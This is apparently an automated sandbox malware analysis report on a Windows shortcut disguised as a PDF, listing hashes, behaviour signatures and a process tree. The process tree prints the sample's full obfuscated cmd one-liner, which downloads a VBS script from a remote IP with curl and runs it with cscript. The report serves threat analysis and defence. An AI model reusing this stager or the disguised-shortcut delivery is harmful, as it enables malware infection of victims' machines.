Analysis
- max time kernel: 150s
- max time network: 158s
- platform: windows10-2004_x64
- resource: win10v2004-20230915-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/10/2023, 04:27
Static task: static1
Behavioral task: behavioral1
- Sample: Fresh Mission and Core Values.pdf.lnk
- Resource: win7-20230831-en
Behavioral task: behavioral2
- Sample: Fresh Mission and Core Values.pdf.lnk
- Resource: win10v2004-20230915-en
General
- Target: Fresh Mission and Core Values.pdf.lnk
- Size: 2KB
- MD5: cea0885964c5c18fd7410ca82e0da52e
- SHA1: 272151f1e4f39fd79457dc3f1538103f153c5bf8
- SHA256: e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e
- SHA512: 3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  flow  pid  Process
  48    100  cscript.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                          Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation  cscript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs ping.exe (1 TTP, 2 IoCs)
  pid   Process
  1436  PING.EXE
  3400  PING.EXE
- Script User-Agent (1 IoC)
  Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  48    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process      procid_target
  PID 1672 wrote to memory of 3820   1672  cmd.exe      86
  PID 1672 wrote to memory of 3820   1672  cmd.exe      86
  PID 3820 wrote to memory of 1436   3820  cmd.exe      87
  PID 3820 wrote to memory of 1436   3820  cmd.exe      87
  PID 3820 wrote to memory of 3444   3820  cmd.exe      90
  PID 3820 wrote to memory of 3444   3820  cmd.exe      90
  PID 3820 wrote to memory of 3400   3820  cmd.exe      92
  PID 3820 wrote to memory of 3400   3820  cmd.exe      92
  PID 3820 wrote to memory of 100    3820  cmd.exe      95
  PID 3820 wrote to memory of 100    3820  cmd.exe      95
  PID 100 wrote to memory of 4516    100   cscript.exe  98
  PID 100 wrote to memory of 4516    100   cscript.exe  98
Processes
[1] C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 1672
    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit
        - Suspicious use of WriteProcessMemory
        PID: 3820
        [3] C:\Windows\system32\PING.EXE
            p"in"G kdYh
            - Runs ping.exe
            PID: 1436
        [3] C:\Windows\system32\curl.exe
            cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
            PID: 3444
        [3] C:\Windows\system32\PING.EXE
            p"in"G -n 3 kdYh
            - Runs ping.exe
            PID: 3400
        [3] C:\Windows\system32\cscript.exe
            C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
            - Blocklisted process makes network request
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
            PID: 100
            [4] C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe"
                PID: 4516
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: c4a8d81a73bc508196aced6725f854a3
  SHA1: d9970f285539d2f55df5dfba815042d37f16a78e
  SHA256: a8f83ce806fe76f2ec67479eadb5985125d274e1fe9bb8dce943360414da9fc0
  SHA512: dd7e3a7b2a301b58ff9615bdeaf3606929a06979bbaba25c7914d565abdef6410ca78665df788783ee2c2a2f083962fc8bc09337a5fd584091eb83131722a641